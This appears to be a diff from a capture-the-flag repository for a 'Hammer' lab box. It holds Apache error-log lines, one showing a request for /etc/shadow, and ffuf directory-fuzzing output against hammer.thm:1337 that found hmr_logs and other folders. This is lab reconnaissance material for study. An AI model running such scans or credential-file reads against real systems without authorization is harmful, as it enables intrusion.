[Mon Aug 19 12:01:22.987654 2024] [authz_core:error] [pid 12346:tid 139999999999998] [client 192.168.1.15:45918] AH01630: client denied by server configuration: /var/www/html/
[Mon Aug 19 12:02:34.876543 2024] [authz_core:error] [pid 12347:tid 139999999999997] [client 192.168.1.12:37210] AH01631: user tester@hammer.thm: authentication failure for "/restricted-area": Password Mismatch
[Mon Aug 19 12:03:45.765432 2024] [authz_core:error] [pid 12348:tid 139999999999996] [client 192.168.1.20:37254] AH01627: client denied by server configuration: /etc/shadow
[Mon Aug 19 12:04:56.654321 2024] [core:error] [pid 12349:tid 139999999999995] [client 192.168.1.22:38100] AH00037: Symbolic link not allowed or link target not accessible: /var/www/html/protected
[Mon Aug 19 12:05:07.543210 2024] [authz_core:error] [pid 12350:tid 139999999999994] [client 192.168.1.25:46234] AH01627: client denied by server configuration: /home/hammerthm/test.php
[Mon Aug 19 12:06:18.432109 2024] [authz_core:error] [pid 12351:tid 139999999999993] [client 192.168.1.30:40232] AH01617: user tester@hammer.thm: authentication failure for "/admin-login": Invalid email address
[Mon Aug 19 12:07:29.321098 2024] [core:error] [pid 12352:tid 139999999999992] [client 192.168.1.35:42310] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon Aug 19 12:09:51.109876 2024] [core:error] [pid 12354:tid 139999999999990] [client 192.168.1.50:45998] AH00037: Symbolic link not allowed or link target not accessible: /var/www/html/locked-down

0
CTF/Hammer/ffuf_command.txt Normal file
View File

1
CTF/Hammer/ffuf_dir_scan1.txt Normal file
View File

@@ -0,0 +1 @@
{"commandline":"ffuf -u http://hammer.thm:1337/hmr_FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -o ffuf_dir_scan1.txt","time":"2025-10-23T16:34:23+02:00","results":[{"input":{"FFUFHASH":"aeb1810","FUZZ":"images"},"position":16,"status":301,"length":320,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_images/","scraper":{},"duration":2872600688,"resultfile":"","url":"http://hammer.thm:1337/hmr_images","host":"hammer.thm:1337"},{"input":{"FFUFHASH":"aeb18225","FUZZ":"css"},"position":549,"status":301,"length":317,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_css/","scraper":{},"duration":79097324,"resultfile":"","url":"http://hammer.thm:1337/hmr_css","host":"hammer.thm:1337"},{"input":{"FFUFHASH":"aeb183ba","FUZZ":"js"},"position":954,"status":301,"length":316,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_js/","scraper":{},"duration":127030112,"resultfile":"","url":"http://hammer.thm:1337/hmr_js","host":"hammer.thm:1337"},{"input":{"FFUFHASH":"aeb188c9","FUZZ":"logs"},"position":2249,"status":301,"length":318,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_logs/","scraper":{},"duration":177266148,"resultfile":"","url":"http://hammer.thm:1337/hmr_logs","host":"hammer.thm:1337"}],"config":{"autocalibration":false,"autocalibration_keyword":"FUZZ","autocalibration_perhost":false,"autocalibration_strategies":["basic"],"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -u http://hammer.thm:1337/hmr_FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -o ffuf_dir_scan1.txt","configfile":"","postdata":"","debuglog":"","delay":{"value":"0.00"},"dirsearch_compatibility":false,"encoders":[],"extensions":[],"fmode":"or","follow_redirects":false,"headers":{},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"clusterbomb","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"FUZZ","value":"/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt","encoders":"","template":""}],"inputshell":"","json":false,"matchers":{"IsCalibrated":false,"Mutex":{},"Matchers":{"status":{"value":"200-299,301,302,307,401,403,405,500"}},"Filters":{},"PerDomainFilters":{}},"mmode":"or","maxtime":0,"maxtime_job":0,"method":"GET","noninteractive":false,"outputdirectory":"","outputfile":"ffuf_dir_scan1.txt","outputformat":"json","OutputSkipEmptyFile":false,"proxyurl":"","quiet":false,"rate":0,"raw":false,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","requestfile":"","requestproto":"https","scraperfile":"","scrapers":"all","sni":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://hammer.thm:1337/hmr_FUZZ","verbose":false,"wordlists":["/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt"],"http2":false,"client-cert":"","client-key":""}}

Some files were not shown because too many files have changed in this diff Show More